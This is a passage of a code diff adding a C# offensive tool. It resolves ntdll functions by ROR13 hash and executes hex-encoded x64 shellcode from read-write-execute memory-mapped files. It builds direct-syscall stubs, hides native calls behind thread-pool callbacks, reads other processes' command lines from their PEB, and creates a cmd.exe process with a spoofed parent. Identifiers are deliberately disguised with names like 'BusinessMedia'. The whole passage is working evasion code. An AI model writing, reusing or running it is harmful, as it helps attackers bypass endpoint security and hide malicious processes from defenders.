     738 + [StructLayout(LayoutKind.Sequential)]
     739 + public struct PsAttributeList
     740 + {
     741 + private const int PsAttributeListSize = 3;
     742 +
     743 + public UIntPtr TotalLength;
     744 + [MarshalAs(UnmanagedType.ByValArray, SizeConst = PsAttributeListSize)]
     745 + public PsAtrribute[] Attributes;
     746 +
     747 + public void Init()
     748 + {
     749 + Attributes = new PsAtrribute[PsAttributeListSize];
     750 + }
     751 + }
     752 +
     753 + public enum TP_CALLBACK_PRIORITY : uint
     754 + {
     755 + TP_CALLBACK_PRIORITY_HIGH = 2,
     756 + TP_CALLBACK_PRIORITY_NORMAL = 0,
     757 + TP_CALLBACK_PRIORITY_LOW = 1
     758 + }
     759 +
     760 + public static IntPtr CreatePtr( object arg )
     761 + {
     762 + IntPtr ptr = Marshal.AllocHGlobal(Marshal.SizeOf( arg ));
     763 + Marshal.StructureToPtr( arg, ptr, false );
     764 + return ptr;
     765 + }
     766 +
     767 + // TpAllocWork
     768 + [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
     769 + public delegate void TpAllocWorkX( out IntPtr WorkReturn, CallBackDelegate Callback, ref IntPtr Context, IntPtr Environment );
     770 + public static void TpAllocWork( out IntPtr WorkReturn, CallBackDelegate Callback, ref IntPtr Context, IntPtr Environment )
     771 + {
     772 + var CoreEngine = CoreEngine<TpAllocWorkX>( CoreExport( "1950996984" ) );
     773 + CoreEngine( out WorkReturn, Callback, ref Context, Environment );
     774 + }
     775 +
     776 + // TpAllocWork
     777 + [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
     778 + public delegate void TpWaitForWorkX( IntPtr WorkReturn, ulong LOGICAL );
     779 + public static void TpWaitForWork( IntPtr WorkReturn, ulong LOGICAL )
     780 + {
     781 + var CoreEngine = CoreEngine<TpWaitForWorkX>( CoreExport( "1553094713" ) );
     782 + CoreEngine( WorkReturn, LOGICAL );
     783 + }
     784 +
     785 + // TpPostWork
     786 + [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
     787 + public delegate void TpPostWorkX( IntPtr Work, TP_CALLBACK_PRIORITY Priority );
     788 + public static void TpPostWork( IntPtr Work, TP_CALLBACK_PRIORITY Priority )
     789 + {
     790 + var CoreEngine = CoreEngine<TpPostWorkX>( CoreExport( "-1554643355" ) );
     791 + CoreEngine( Work, Priority );
     792 + }
     793 +
     794 + // TpReleaseWork
     795 + [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
     796 + public delegate void TpReleaseWorkX( IntPtr Work );
     797 + public static void TpReleaseWork( IntPtr Work )
     798 + {
     799 + var CoreEngine = CoreEngine<TpReleaseWorkX>( CoreExport( "536716890" ) );
     800 + CoreEngine( Work );
     801 + }
     802 +
     803 + // ZwGetNextThread
     804 + public delegate NTSTATUS CoreEngineThreadNext( IntPtr ProcessHandle, IntPtr ThreadHandle, uint /*ACCESS_MASK*/ DesiredAccess, ulong HandleAttributes, ulong BusinessShow, out IntPtr BusinessMediaShow, string ErrorCodea, string ErrorCodeb );
     805 + public static NTSTATUS CoreNextT( string buffer1, string buffer2, string buffer3, IntPtr ProcessHandle, IntPtr ThreadHandle, uint /*ACCESS_MASK*/ DesiredAccess, ulong HandleAttributes, ulong BusinessShow, out IntPtr BusinessMediaShow )
     806 + {
     807 + var CoreEngine = CoreEngine<CoreEngineThreadNext>( EngineVal( "-1976793764" ) );
     808 + return CoreEngine( ProcessHandle, ThreadHandle, DesiredAccess, HandleAttributes, BusinessShow, out BusinessMediaShow, "a", "b" );
     809 + }
     810 +
     811 + // ZwGetNextProcess
     812 + public delegate NTSTATUS CoreEngineNext( IntPtr ProcessHandle, uint /*ACCESS_MASK*/ DesiredAccess, CORE_Flags HandleAttributes, ulong BusinessShow, out IntPtr NewBusinessMedia, string ErrorCodea, string ErrorCodeb );
     813 + public static NTSTATUS CoreNext( string buffer1, string buffer2, string buffer3, IntPtr ProcessHandle, uint /*ACCESS_MASK*/ DesiredAccess, CORE_Flags HandleAttributes, ulong BusinessShow, out IntPtr NewBusinessMedia )
     814 + {
     815 + var CoreEngine = CoreEngine<CoreEngineNext>( EngineVal( "659301084" ) );
     816 + return CoreEngine( ProcessHandle, DesiredAccess, HandleAttributes, BusinessShow, out NewBusinessMedia, "a", "b" );
     817 + }
     818 +
     819 + // ZwQueryInformationProcess
     820 + public delegate NTSTATUS CoreEngineQuery( IntPtr ProcessHandle, CORE_INFORMATION_CLASS ProcessInformationClass, out CORE_BASIS PBI, int ProcessInformationLength, out int BusinessShowForRunners, string ErrorCodea, string ErrorCodeb );
     821 + public static NTSTATUS CoreQuery( string buffer1, string buffer2, string buffer3, IntPtr ProcessHandle, CORE_INFORMATION_CLASS ProcessInformationClass, out CORE_BASIS PBI, int ProcessInformationLength, out int BusinessShowForRunners )
     822 + {
     823 + var CoreEngine = CoreEngine<CoreEngineQuery>( EngineVal( "-1318067143" ) );
     824 + return CoreEngine( ProcessHandle, ProcessInformationClass, out PBI, ProcessInformationLength, out BusinessShowForRunners, "a", "b" );
     825 + }
     826 +
     827 + public delegate NTSTATUS CoreEngineReadB( IntPtr BusinessMedia, IntPtr Buffer, [System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)] string buf, IntPtr BusinessShowForRunnersOnTrailAnd, IntPtr BusinessShowForRunnersOnTrail, string ErrorCodea, string ErrorCodeb );
     828 + public static NTSTATUS CoreReadB( string buffer1, string buffer2, string buffer3, IntPtr BusinessMedia, IntPtr Buffer, [System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)] string buf, IntPtr BusinessShowForRunnersOnTrailAnd, IntPtr BusinessShowForRunnersOnTrail )
     829 + {
     830 + var CoreEngine = CoreEngine<CoreEngineReadB>( EngineVal( "1039115714" ) );
     831 + return CoreEngine( BusinessMedia, Buffer, buf, BusinessShowForRunnersOnTrailAnd, BusinessShowForRunnersOnTrail, "a", "b" );
     832 + }
     833 +
     834 + public delegate NTSTATUS CoreEngineReadA( IntPtr BusinessMedia, IntPtr BaseAddress, out IntPtr Buffer, UInt32 BusinessShowForRunnersOnTrailAnd, ref UInt32 BusinessShowForRunnersOnTrail, string ErrorCodea, string ErrorCodeb );
     835 + public static NTSTATUS CoreRead( string buffer1, string buffer2, string buffer3, IntPtr BusinessMedia, IntPtr BaseAddress, out IntPtr Buffer, UInt32 BusinessShowForRunnersOnTrailAnd, ref UInt32 BusinessShowForRunnersOnTrail )
     836 + {
     837 + var CoreEngine = CoreEngine<CoreEngineReadA>( EngineVal( "1039115714" ) );
     838 + return CoreEngine( BusinessMedia, BaseAddress, out Buffer, BusinessShowForRunnersOnTrailAnd, ref BusinessShowForRunnersOnTrail, "a", "b" );
     839 + }
     840 +
     841 + public delegate NTSTATUS CoreEngineRead( IntPtr BusinessMedia, IntPtr BaseAddress, out UNICODE_STRING Buffer, IntPtr BusinessShowForRunnersOnTrailAnd, IntPtr BusinessShowForRunnersOnTrail, string ErrorCodea, string ErrorCodeb );
     842 + public static NTSTATUS CoreReadA( string buffer1, string buffer2, string buffer3, IntPtr BusinessMedia, IntPtr BaseAddress, out UNICODE_STRING Buffer, IntPtr BusinessShowForRunnersOnTrailAnd, IntPtr BusinessShowForRunnersOnTrail )
     843 + {
     844 + var CoreEngine = CoreEngine<CoreEngineRead>( EngineVal( "1039115714" ) );
     845 + return CoreEngine( BusinessMedia, BaseAddress, out Buffer, BusinessShowForRunnersOnTrailAnd, BusinessShowForRunnersOnTrail, "a", "b" );
     846 + }
     847 +
     848 + // ZwResumeThread
     849 + public delegate NTSTATUS CoreResumeX( IntPtr Thread, out ulong SuspendCount );
     850 + public static NTSTATUS CoreResume( IntPtr Thread, out ulong SuspendCount )
     851 + {
     852 + var CoreEngine = CoreEngine<CoreResumeX>( EngineVal( "-884324616" ) );
     853 + return CoreEngine( Thread, out SuspendCount );
     854 + }
     855 +
     856 + // ZwCreateUserProcess
     857 + [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
     858 + public delegate NTSTATUS CoreCreateProcessX( ref IntPtr processHandle, ref IntPtr threadHandle, long processDesiredAccess, long threadDesiredAccess, IntPtr processObjectAttributes, IntPtr threadObjectAttributes, uint processFlags, uint threadFlags, IntPtr processParameters, ref PsCreateInfo psCreateInfo, ref PsAttributeList psAttributeList );
     859 + public static NTSTATUS CoreCreateProcess( ref IntPtr processHandle, ref IntPtr threadHandle, long processDesiredAccess, long threadDesiredAccess, IntPtr processObjectAttributes, IntPtr threadObjectAttributes, uint processFlags, uint threadFlags, IntPtr processParameters, ref PsCreateInfo psCreateInfo, ref PsAttributeList psAttributeList )
     860 + {
     861 + var CoreEngine = CoreEngine<CoreCreateProcessX>( EngineVal( "-185512144" ) );
     862 + return CoreEngine( ref processHandle, ref threadHandle, processDesiredAccess, threadDesiredAccess, processObjectAttributes, threadObjectAttributes, processFlags, threadFlags, processParameters, ref psCreateInfo, ref psAttributeList );
     863 + }
     864 +
     865 + // RtlCreateProcessParametersEx
     866 + [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
     867 + public delegate NTSTATUS CoreCreateParmsX( out IntPtr processParameters, IntPtr imagePathName, IntPtr dllPath, IntPtr currentDirectory, IntPtr commandLine, IntPtr environment, IntPtr windowTitle, IntPtr desktopInfo, IntPtr shellInfo, IntPtr runtimeData, ulong flags );
     868 + public static NTSTATUS CoreCreateParms( out IntPtr processParameters, IntPtr imagePathName, IntPtr dllPath, IntPtr currentDirectory, IntPtr commandLine, IntPtr environment, IntPtr windowTitle, IntPtr desktopInfo, IntPtr shellInfo, IntPtr runtimeData, ulong flags )
     869 + {
     870 + byte[] bytes = new byte[12];
     871 + Buffer.BlockCopy ((byte[])BitConverter.GetBytes( (Int64)CoreReturnFuncAddr( "-437962438" ) ), 0, bytes, 2, 8);
     872 + bytes[0] = 0x48; // movabs rax, FunctionPtr
     873 + bytes[1] = 0xB8;
     874 + bytes[10] = 0xFF; // jmp rax
     875 + bytes[11] = 0xE0;
     876 + var CoreEngine = CoreEngine<CoreCreateParmsX>( bytes );
     877 + return CoreEngine( out processParameters, imagePathName, dllPath, currentDirectory, commandLine, environment, windowTitle, desktopInfo, shellInfo, runtimeData, flags );
     878 + }
     879 +
     880 + // RtlDestroyProcessParameters
     881 + [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
     882 + public delegate NTSTATUS CoreDestroyParmsX( IntPtr processParameters );
     883 + public static NTSTATUS CoreDestroyParms( IntPtr processParameters )
     884 + {
     885 + byte[] bytes = new byte[12];
     886 + Buffer.BlockCopy ((byte[])BitConverter.GetBytes( (Int64)CoreReturnFuncAddr( "90443789" ) ), 0, bytes, 2, 8);
     887 + bytes[0] = 0x48; // movabs rax, FunctionPtr
     888 + bytes[1] = 0xB8;
     889 + bytes[10] = 0xFF; // jmp rax
     890 + bytes[11] = 0xE0;
     891 + var CoreEngine = CoreEngine<CoreDestroyParmsX>( bytes );
     892 + return CoreEngine( processParameters );
     893 + }
     894 +
     895 + // ZwDelayExecution
     896 + public delegate NTSTATUS NappingX( bool Alertable, IntPtr dwMilliseconds );
     897 + public static NTSTATUS Napping( bool Alertable, IntPtr dwMilliseconds )
     898 + {
     899 + var CoreEngine = CoreEngine<NappingX>( EngineVal( "1425089620" ) );
     900 + return CoreEngine( Alertable, dwMilliseconds );
     901 + }
     902 +
     903 + // ZwWaitForSingleObject
     904 + public delegate NTSTATUS ZwWaitForSingleObjectX( IntPtr hHandle, bool Alertable, LARGE_INTEGER dwMilliseconds );
     905 + public static NTSTATUS ZwWaitForSingleObject( IntPtr hHandle, bool Alertable, LARGE_INTEGER dwMilliseconds )
     906 + {
     907 + var CoreEngine = CoreEngine<ZwWaitForSingleObjectX>( EngineVal( "1845938099" ) );
     908 + return CoreEngine( hHandle, Alertable, dwMilliseconds );
     909 + }
     910 +
     911 + [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
     912 + public delegate void CallBackDelegate(IntPtr Instance, IntPtr Context, IntPtr Work);
     913 +
     914 +
     915 + // Find function by hash in ntdll.dll and return memory address
     916 + public static IntPtr CoreReturnFuncAddr( string hash )
     917 + {
     918 +
     919 + IntPtr ModuleBase = (IntPtr)ptrToGS;
     920 + IntPtr FunctionPtr = IntPtr.Zero;
     921 + Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C));
     922 + Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14));
     923 + Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18;
     924 + Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader);
     925 + Int64 pExport = OptHeader + 0x70;
     926 + Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport);
     927 + Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10));
     928 + Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14));
     929 + Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18));
     930 + Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C));
     931 + Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20));
     932 + Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24));
     933 +
     934 + for (int i = 0; i < NumberOfNames; i++)
     935 + {
     936 + // ROR13 hash calc
     937 + uint functionHash = 0;
     938 + foreach ( char ch in Marshal.PtrToStringAnsi( (IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4)))) )
     939 + {
     940 + uint ii = (uint)ch;
     941 + functionHash = ((functionHash >> 13 | functionHash << (32 - 13)) & 0xFFFFFFFF);
     942 + functionHash = (functionHash + ii);
     943 + }
     944 + if ( ( (int)(functionHash & 0xFFFFFFFF) ) == Convert.ToInt64(hash) )
     945 + {
     946 + Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase;
     947 + Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase))));
     948 + FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA);
     949 + break;
     950 + }
     951 + }
     952 + return FunctionPtr;
     953 + }
     954 +
     955 + // Get ntdll.dll base address from memory (Only 64 bit)
     956 + [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
     957 + public delegate ulong ResolveBaseX( ref ulong ptrToGS );
     958 + public static ulong ResolveBase( ref ulong ptrToGS )
     959 + {
     960 + string HelperStr =
     961 + "5251555049C7C36C0700004D89DF4D39FB0F85BE00000049FFC349FFC34983EB0249C7C36C0700004D89DF4D39FB0F85A10000004983EB0349C7C36C0700004D89DF4D39FB0F858A0000004983EB0141B934000000EB4849C7C36C0700004D89DF4D39FB756F49FFC39090904983EB024983EB034983EB0165488B042560000000488B4018488B4020488B00488B40204889C2488B4D70488911585D595AC349C7C36C0700004D89DF4D39FB752749FFC341B90D0000004983EB064983EB0349C7C36C0700004D89DF4D39FB75074983EB0890EB3C49C7C36C0700004D89DF4D39FB75F14983EB024983EB034983EB0149FFC349C7C36C0700004D89DF4D39FB75D349C7C61000000049C7C712000000C349C7C36C0700004D89DF4D39FB75B549FFC34983EB094983EB034983EB024983EB064983EB104983EB1249C7C36C0700004D89DF4D39FB758B4989C490E904FFFFFF";
     962 + byte[] bytes = new byte[HelperStr.Length / 2];
     963 + int idx = 0;
     964 + for (int i = 0; i <= (HelperStr.Length / 2)-1; i++)
     965 + {
     966 + bytes[i] = Convert.ToByte(HelperStr.Substring(idx, 2), 16);
     967 + idx = idx + 2;
     968 + }
     969 + var Core = CoreEngine<ResolveBaseX>( bytes );
     970 + return Core( ref ptrToGS );
     971 + }
     972 +
     973 + // Find function by hash in ntdll.dll and return memory address
     974 + public static byte[] CoreExport( string hash )
     975 + {
     976 +
     977 + byte[] bytes = new byte[12];
     978 + IntPtr ModuleBase = (IntPtr)ptrToGS;
     979 + IntPtr FunctionPtr = IntPtr.Zero;
     980 + Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C));
     981 + Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14));
     982 + Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18;
     983 + Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader);
     984 + Int64 pExport = OptHeader + 0x70;
     985 + Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport);
     986 + Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10));
     987 + Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14));
     988 + Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18));
     989 + Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C));
     990 + Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20));
     991 + Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24));
     992 +
     993 + for (int i = 0; i < NumberOfNames; i++)
     994 + {
     995 + // ROR13 hash calc
     996 + uint functionHash = 0;
     997 + foreach ( char ch in Marshal.PtrToStringAnsi( (IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4)))) )
     998 + {
     999 + uint ii = (uint)ch;
     1000 + functionHash = ((functionHash >> 13 | functionHash << (32 - 13)) & 0xFFFFFFFF);
     1001 + functionHash = (functionHash + ii);
     1002 + }
     1003 + if ( ( (int)(functionHash & 0xFFFFFFFF) ) == Convert.ToInt64(hash) )
     1004 + {
     1005 + Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase;
     1006 + Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase))));
     1007 + FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA);
     1008 + Buffer.BlockCopy ((byte[])BitConverter.GetBytes( (Int64)FunctionPtr ), 0, bytes, 2, 8);
     1009 + bytes[0] = 0x48; // movabs rax, FunctionPtr
     1010 + bytes[1] = 0xB8;
     1011 + bytes[10] = 0xFF; // jmp rax
     1012 + bytes[11] = 0xE0;
     1013 + break;
     1014 + }
     1015 + }
     1016 + return bytes;
     1017 + }
     1018 +
     1019 + // Create memory mapped RWX file
     1020 + public static unsafe START CoreEngine<START>(byte[] buffer) where START : class
     1021 + {
     1022 + try
     1023 + {
     1024 + // https://docs.microsoft.com/en-us/dotnet/api/system.io.memorymappedfiles.memorymappedfile.createnew?view=net-5.0
     1025 + MemMapSystemMem = System.IO.MemoryMappedFiles.MemoryMappedFile.CreateNew( Guid.NewGuid().ToString(), buffer.Length, (System.IO.MemoryMappedFiles.MemoryMappedFileAccess)5 );
     1026 + MemMapViewAccessor = MemMapSystemMem.CreateViewAccessor( 0, buffer.Length, (System.IO.MemoryMappedFiles.MemoryMappedFileAccess)5 );
     1027 + MemMapViewAccessor.WriteArray(0, buffer, 0, buffer.Length);
     1028 + byte* String = (byte*)IntPtr.Zero; // (byte*)0;
     1029 + MemMapViewAccessor.SafeMemoryMappedViewHandle.AcquirePointer(ref String);
     1030 + return (START)(object)System.Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer( (IntPtr)String, typeof(START) );
     1031 + }
     1032 + catch
     1033 + {
     1034 + return null;
     1035 + }
     1036 + finally
     1037 + {
     1038 + //MemMapSystemMem.Dispose();
     1039 + //MemMapViewAccessor.Dispose();
     1040 + }
     1041 + }
     1042 +
     1043 + public static byte [] EngineVal( string hash )
     1044 + {
     1045 +
     1046 + IntPtr ModuleBase = (IntPtr)ptrToGS;
     1047 + byte[] opcode = new byte[] { 0x0, 0x0 };
     1048 + IntPtr FunctionPtr = IntPtr.Zero;
     1049 + Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C));
     1050 + Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14));
     1051 + Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18;
     1052 + Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader);
     1053 + Int64 pExport = OptHeader + 0x70;
     1054 + Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport);
     1055 + Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10));
     1056 + Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14));
     1057 + Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18));
     1058 + Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C));
     1059 + Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20));
     1060 + Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24));
     1061 +
     1062 + for (int i = 0; i < NumberOfNames; i++)
     1063 + {
     1064 + // ROR13 hash calc
     1065 + uint functionHash = 0;
     1066 + foreach ( char ch in Marshal.PtrToStringAnsi( (IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4)))) )
     1067 + {
     1068 + uint ii = (uint)ch;
     1069 + functionHash = ((functionHash >> 13 | functionHash << (32 - 13)) & 0xFFFFFFFF);
     1070 + functionHash = (functionHash + ii);
     1071 + }
     1072 + if ( ( (int)(functionHash & 0xFFFFFFFF) ) == Convert.ToInt64(hash) )
     1073 + {
     1074 + Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase;
     1075 + Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase))));
     1076 + FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA);
     1077 + opcode[0] = Marshal.ReadByte( FunctionPtr + 4);
     1078 + opcode[1] = Marshal.ReadByte( FunctionPtr + 5);
     1079 + break;
     1080 + }
     1081 + }
     1082 +
     1083 + string Helper = "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";
     1084 + byte[] bytes = new byte[Helper.Length / 2];
     1085 + int idx = 0;
     1086 + for (int i = 0; i <= (Helper.Length / 2)-1; i++)
     1087 + {
     1088 + bytes[i] = Convert.ToByte(Helper.Substring(idx, 2), 16);
     1089 + idx = idx + 2;
     1090 + }
     1091 + byte[] buffer = (byte[])BitConverter.GetBytes( (Int32)(BitConverter.ToInt16( opcode, 0 ) + 1000 ) );
     1092 + bytes[23] = buffer[0]; bytes[24] = buffer[1]; bytes[25] = buffer[2]; bytes[26] = buffer[3];
     1093 + buffer = (byte[])BitConverter.GetBytes( (Int64)FunctionPtr );
     1094 + bytes[104] = buffer[0]; bytes[105] = buffer[1]; bytes[106] = buffer[2]; bytes[107] = buffer[3]; bytes[108] = buffer[4]; bytes[109] = buffer[5]; bytes[110] = buffer[6]; bytes[111] = buffer[7];
     1095 + return bytes;
     1096 + }
     1097 +
     1098 + static void WorkCallback_CoreDestroyParms(IntPtr Instance, IntPtr Context, IntPtr Work)
     1099 + {
     1100 + CoreDestroyParms( ProcessParams );
     1101 + }
     1102 +
     1103 + static void WorkCallback_CoreResume(IntPtr Instance, IntPtr Context, IntPtr Work)
     1104 + {
     1105 + CoreResume( NewRemoteThread, out SuspendCount );
     1106 + }
     1107 +
     1108 + static void WorkCallback_CoreCreateParms(IntPtr Instance, IntPtr Context, IntPtr Work)
     1109 + {
     1110 + CoreCreateParms( out ProcessParams , PtrToImagePath, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, 0x00000001 );
     1111 + }
     1112 +
     1113 + static void WorkCallback_CoreCreateProcess(IntPtr Instance, IntPtr Context, IntPtr Work)
     1114 + {
     1115 + CoreCreateProcess( ref RemoteProcess, ref NewRemoteThread, 0x1FFFFF, 0x1FFFFF, IntPtr.Zero, IntPtr.Zero, 0x00000000, 0x0000001, ProcessParams, ref info, ref attributeList );
     1116 + }
     1117 +
     1118 +
     1119 + // Find process
     1120 + public static int CoreFindProcess( ref IntPtr ProcessHandle, ref IntPtr NewRemoteThreadHandle, string arg1, string arg2, string arg3 )
     1121 + {
     1122 + ulong Flags = 0;
     1123 + for (int i = 0; i <= 1000; i++ ) // make sure we don't loop forever
     1124 + {
     1125 + // ZwGetNextProcess
     1126 + CoreNext( "a", "b", "c", ProcessHandle, 0x10000000 /*0x10000000 ACCESS_MASK.GENERIC_ALL*/, CORE_Flags.None, Flags, out ProcessHandle );
     1127 + try
     1128 + {
     1129 + CORE_BASIS PBI = new CORE_BASIS();
     1130 + int ReturnLength = 0;
     1131 + // ZwQueryInformationProcess
     1132 + CoreQuery( "a", "b", "c", ProcessHandle, CORE_INFORMATION_CLASS.ProcessBasicInformation, out PBI, System.Runtime.InteropServices.Marshal.SizeOf( PBI ), out ReturnLength );
     1133 + long PEBaddress = PBI.PebBaseAddress.ToInt64();
     1134 + IntPtr PtrToStructure = new IntPtr();
     1135 + UInt32 NumberOfBytesRead = 0;
     1136 + UInt32 NumberOfBytesToRead = (UInt32)System.Runtime.InteropServices.Marshal.SizeOf( PtrToStructure );
     1137 + // ZwReadVirtualMemory
     1138 + CoreRead( "a", "b", "c", ProcessHandle, new IntPtr(PEBaddress + 0x20), out PtrToStructure, NumberOfBytesToRead, ref NumberOfBytesRead );
     1139 + UNICODE_STRING UnicodeStringCommandLine = new UNICODE_STRING();
     1140 + // ZwReadVirtualMemory
     1141 + CoreReadA( "a", "b", "c", ProcessHandle, new IntPtr((long)PtrToStructure + 0x70), out UnicodeStringCommandLine, new IntPtr(System.Runtime.InteropServices.Marshal.SizeOf(UnicodeStringCommandLine)), IntPtr.Zero );
     1142 + string StringCommandLine = new string('\0', UnicodeStringCommandLine.Length / 2);
     1143 + // ZwReadVirtualMemory
     1144 + CoreReadB( "a", "b", "c", ProcessHandle, (IntPtr)UnicodeStringCommandLine.Buffer, StringCommandLine, new IntPtr(UnicodeStringCommandLine.Length), IntPtr.Zero );
     1145 + StringCommandLine = StringCommandLine.ToLower();
     1146 + if (StringCommandLine.Contains( arg1.ToLower() ) & StringCommandLine.Contains( arg2.ToLower() ) & StringCommandLine.Contains( arg3.ToLower() ))
     1147 + {
     1148 + // ZwGetNextThread
     1149 + CoreNextT( "a", "b", "c", ProcessHandle, NewRemoteThreadHandle, 267386880+1048576 /*ACCESS_MASK.GENERIC_ALL*/, 0, 0, out NewRemoteThreadHandle );
     1150 + break;
     1151 + }
     1152 + }
     1153 + catch (Exception e)
     1154 + {
     1155 + Console.WriteLine( "status: {0}", e.Message );
     1156 + }
     1157 + }
     1158 + return 0;
     1159 + }
     1160 +
     1161 + static void Main()
     1162 + {
     1163 +
     1164 + IntPtr PtrZero = IntPtr.Zero;
     1165 + IntPtr SpoofedProcess = IntPtr.Zero;
     1166 + IntPtr SpoofedThread = IntPtr.Zero;
     1167 + ResolveBase( ref ptrToGS );
     1168 + CoreFindProcess( ref SpoofedProcess, ref SpoofedThread, "cmd.exe", "spoofed", "");
     1169 + CoreFindProcess( ref RemoteProcess, ref NewRemoteThread, "cmd.exe", "remote", "");
     1170 + ImagePath = ConvertToUnicode(String.Format("\\??\\{0}", "C:\\Windows\\System32\\cmd.exe"));
     1171 + ProcessParams = CreatePtr( ProcessParams64 );
     1172 + PtrToImagePath = CreatePtr( ImagePath );
     1173 +
     1174 + info = new PsCreateInfo();
     1175 + info.Size = (UIntPtr)Marshal.SizeOf<PsCreateInfo>();
     1176 + info.State = PsCreateState.PsCreateInitialState;
     1177 + attributeList = new PsAttributeList();
     1178 + attributeList.Init();
     1179 +
     1180 + attributeList.TotalLength = (UIntPtr)Marshal.SizeOf<PsAttributeList>();
     1181 + attributeList.Attributes[0].Attribute = 0x20005;
     1182 + attributeList.Attributes[0].Size = (UIntPtr)ImagePath.Length;
     1183 + attributeList.Attributes[0].Value = ImagePath.Buffer;
     1184 +
     1185 + attributeList.TotalLength = (UIntPtr)Marshal.SizeOf<PsAttributeList>();
     1186 + attributeList.Attributes[1].Attribute = 0x60000;
     1187 + attributeList.Attributes[1].Size = (UIntPtr)IntPtr.Size;
     1188 + attributeList.Attributes[1].Value = SpoofedProcess;
     1189 +
     1190 + IntPtr pValue = Marshal.AllocHGlobal(UIntPtr.Size);
     1191 + Marshal.WriteInt64(pValue, 0x100000000000 );
     1192 + attributeList.TotalLength = (UIntPtr)Marshal.SizeOf<PsAttributeList>();
     1193 + attributeList.Attributes[2].Attribute = 0x20010;
     1194 + attributeList.Attributes[2].Size = (UIntPtr)UIntPtr.Size;
     1195 + attributeList.Attributes[2].Value = pValue;
     1196 +
